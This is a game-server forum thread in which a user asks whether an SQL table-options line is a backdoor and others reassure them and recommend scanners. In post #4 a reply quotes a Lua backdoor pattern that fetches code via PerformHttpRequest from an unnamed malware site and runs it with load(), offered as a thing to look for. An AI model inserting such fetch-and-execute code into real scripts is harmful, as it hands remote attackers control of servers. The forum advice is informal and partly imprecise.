HighLeaks
Help

[QUESTION] How to spot a potential backdoor?

songbirdmusic_19573 songbirdmusic_19573 Started 17 replies 2,852 views
#1
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci
#1




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...






That line is perfectly fine for a database
#2
This is just setting the auto increment, and default charset for the DB you imported
#3
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
#4
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)





things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
#5




Hopatchke,

wrote:



PerformHttpRequest(' Sht that goes to a malware website., function (e, d)

local s = assert(load(d))

if (d == nil) then return end

s()

end)



thing...




Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
#6




songbirdmusic_19573,

wrote:



Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...




malwarebytes , the free version offers a good scan ;) , works perfectly!
#7




Hopatchke,

wrote:



malwarebytes , the free version offers a good scan ;) , works perfectly!




I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to
#8
grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh
#9




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...




i need to know too thanks for creating this thread
#10
you never know if they add back doors when its too late
#11




Du22121,

wrote:



you never know if they add back doors when its too late




Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for
#12




songbirdmusic_19573,

wrote:



Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse...




It would be cool to create a topic to explain how to do it and which tool to use :);)
#13




songbirdmusic_19573,

wrote:



I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...




if you want to detect backdoors look for performhttp inside scripts
#14
Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder



Thanks,
#15
It is just a SQL Statement
#16




cochinofrito,

wrote:



Hello,

Here is a tool to achieve this.

https://github.com/exersalza/FivemCipherFinder



Thanks,




Your are truly the goat for this
#17
use cochinofrito cipherfinder is great tho